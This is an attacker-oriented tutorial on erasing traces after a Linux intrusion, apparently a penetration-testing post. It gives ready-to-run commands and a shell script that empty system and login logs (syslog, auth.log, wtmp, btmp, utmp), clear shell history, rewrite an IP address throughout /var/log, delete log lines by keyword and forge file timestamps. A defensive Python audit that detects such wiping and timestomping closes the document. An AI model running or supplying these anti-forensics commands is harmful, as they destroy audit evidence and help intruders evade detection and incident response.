Cleaning up traces on Linux

After a penetration is finished, to reduce the chance of being discovered and traced back, the attacker has to clear the traces of the attack. This post summarises the ways of cleaning up traces on Linux. (It may not be complete; only the most common methods are collected, and they may not be thorough.)

Clearing the shell history

vim ~/.bash_history
history -c

Clearing logs

echo > /var/log/syslog;echo > /var/log/messages;echo > /var/log/httpd/access_log;echo > /var/log/httpd/error_log;echo > /var/log/xferlog;echo > /var/log/secure;echo > /var/log/auth.log;echo > /var/log/user.log;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/btmp;echo > /var/run/utmp ;history -c

echo | tee /var/log/syslog /var/log/messages /var/log/httpd/access_log /var/log/httpd/error_log /var/log/xferlog /var/log/secure /var/log/auth.log /var/log/user.log /var/log/wtmp /var/log/lastlog /var/log/btmp /var/run/utmp > /dev/null
history -c

Replacing an IP address by pattern match

sed -i "s/132.23.11.x/ 192.7.22.12/g" `grep 132.23.11.x -rl /var/log`

Changing file timestamps

touch -r A.php B.php;history -c
# gives file B the timestamps of file A
touch -d "2021-03-29 14:01:22" 1.txt;history -c
# sets the file's timestamp to the given time

Deleting lines that match a date or another keyword

sh delect.sh 2022-06-01

delect.sh:

#!/bin/bash
# For every file under /var/log that contains the keyword given as $1,
# drop the matching lines and write the rest back in place.
for f in `grep "$1" -rl /var/log`
do
 tmp=$(sed -e /$1/d $f);
 printf "%s" "$tmp" > $f
done ;
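As an added defender-side example (not part of the original post), the audit below looks for the artefacts the techniques above leave behind: a log that holds nothing but the single newline that `echo >` or `echo | tee` writes, a binary utmp-family file whose length is no longer a whole number of records, and a log whose mtime lags its ctime, since `touch -d`/`touch -r` can set mtime but the kernel sets ctime itself. The log paths and the 384-byte utmp record size (glibc, x86_64) are assumptions.

```python
#!/usr/bin/env python3
"""Audit Linux logs for the artefacts that wiping and timestomping leave behind."""
import os

# Constructed for this example; adjust to the distribution's log layout.
LOG_FILES = ["/var/log/syslog", "/var/log/messages", "/var/log/auth.log",
             "/var/log/secure", "/var/log/wtmp", "/var/log/btmp",
             "/var/log/lastlog", "/var/run/utmp"]
UTMP_LOGS = {"wtmp", "btmp", "utmp"}       # fixed-size binary records
UTMP_RECORD = 384                          # sizeof(struct utmp), glibc x86_64 (assumed)
SLACK = 3600                               # seconds of mtime/ctime drift tolerated


def classify(name, size, head, mtime, ctime, slack=SLACK):
    """Return findings for one log given its size, first two bytes and timestamps.

    'empty'           size 0: the log was emptied outright
    'echo-truncated'  the file is exactly one newline, the signature of
                      `echo > file` and `echo | tee file`
    'bad-record-size' a utmp-family log whose length is not a multiple of the
                      record size, i.e. a text write corrupted it
    'timestomped'     mtime lags ctime by more than `slack`; appends move both
                      together, and userland cannot set ctime
    """
    findings = []
    if size == 0:
        findings.append("empty")
    elif head == b"\n":                    # read(2) returned only a newline
        findings.append("echo-truncated")
    if name in UTMP_LOGS and size % UTMP_RECORD:
        findings.append("bad-record-size")
    if ctime - mtime > slack:
        findings.append("timestomped")
    return findings


def audit(paths=LOG_FILES):
    """Stat each readable path and map it to its findings (empty list = clean)."""
    report = {}
    for path in paths:
        try:
            st = os.stat(path)
            with open(path, "rb") as fh:
                head = fh.read(2)
        except OSError:
            continue                       # absent or unreadable on this host
        report[path] = classify(os.path.basename(path), st.st_size, head,
                                st.st_mtime, st.st_ctime)
    return report


if __name__ == "__main__":
    for path, findings in audit().items():
        print(f"{path}: {', '.join(findings) or 'ok'}")
```

Run it as root so the utmp-family files are readable; a rotated log will legitimately stop moving its mtime, so treat 'timestomped' on an inactive file as a lead rather than proof.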